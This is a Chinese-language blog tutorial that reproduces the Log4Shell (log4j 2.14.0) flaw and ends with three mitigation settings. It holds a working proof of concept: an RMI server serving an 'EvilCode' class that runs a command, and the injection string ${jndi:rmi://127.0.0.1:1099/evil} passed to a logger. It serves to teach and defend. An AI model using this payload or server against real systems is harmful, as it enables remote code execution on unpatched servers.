java~RMI引起的log4j漏洞

2021-12-10日左右，java的log4j框架出現了一個大漏洞，對服務器案例引起了不小的影響，當然只對於log4j的日誌使用者來說，如果你是spring框架，用的是logback，不存在這個問題。

RMI和JNDI

• RMI（Remote Method Invocation） 即Java遠程方法調用，一種用於實現遠程過程調用的應用程序編程接口
• JNDI (Java Naming and Directory Interface)是一個應用程序設計的API，爲開發人員提供了查找和訪問各種命名和目錄服務的通用、統一的接口
• JNDI和RMI的主要關係是RMI註冊的服務可以通過JNDIAPI訪問。在討論到Spring反序列化漏洞之前，先看看如果通過JNDI來調用RMI註冊的服務。

模擬漏洞重現

• pom依賴

    <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
            <exclusions>
                <exclusion>
                    <groupId>org.springframework.boot</groupId>
                    <artifactId>spring-boot-starter-logging</artifactId>
                </exclusion>
            </exclusions>
        </dependency>

        <!--log4j2核心包-->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.0</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.0</version>
        </dependency>

• 黑客端

/**
 * 構建RMI服務來響應惡意代碼
 * <p>
 * Java RMI，即 遠程方法調用（Remote Method Invocation），一種用於實現遠程過程調用(RPC)的Java API， 能直接傳輸序列化後的Java對象和分佈式垃圾收集。它的實現依賴於(JVM)，因此它僅支持從一個JVM到另一個JVM的調用。
 */
public class RMIServer {
  @SneakyThrows
  public static void main(String... args) {
    try {
      // 本地主機上的遠程對象註冊表Registry的實例,默認端口1099
      LocateRegistry.createRegistry(1099);
      Registry registry = LocateRegistry.getRegistry();
      System.out.println("Create RMI registry on port 1099");
      //返回的Java對象
      Reference reference = new Reference("bug.EvilCode", "bug.EvilCode", null);
      ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
      // 把遠程對象註冊到RMI註冊服務器上，並命名爲evil
      registry.bind("evil", referenceWrapper);
    } catch (RemoteException | AlreadyBoundException | NamingException e) {
      e.printStackTrace();
    }
  }

/**
 * 執行任意的腳本，目前的腳本會使windows服務器打開計算器.
 */
public class EvilCode {
  static {
    System.out.println("受害服務器將執行下面命令行");
    Process p;

    String[] cmd = {"calc"};
    try {
      p = Runtime.getRuntime().exec(cmd);
      InputStream fis = p.getInputStream();
      InputStreamReader isr = new InputStreamReader(fis);
      BufferedReader br = new BufferedReader(isr);
      String line = null;
      while ((line = br.readLine()) != null) {
        System.out.println(line);
      }
    } catch (IOException e) {
      e.printStackTrace();
    }
  }
}

• 網站端

public class Server {
  private static final Logger logger = LogManager.getLogger();

  public static void main(String[] args) {
    String name = "${java:runtime}";
    logger.info("name:{}", name);
    //模擬填寫數據,輸入構造好的字符串,使受害服務器打印日誌時執行遠程的代碼 同一臺可以使用127.0.0.1
    String username = "${jndi:rmi://127.0.0.1:1099/evil}";
    //正常打印業務日誌
    logger.error("username:{}", username);

  }
}

【緊急補救措施3選1】

1. 修改 JVM 參數 -Dlog4j2.formatMsgNoLookups=true
2. 修改配置 log4j2.formatMsgNoLookups=True
3. 將系統環境變量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 設置爲 true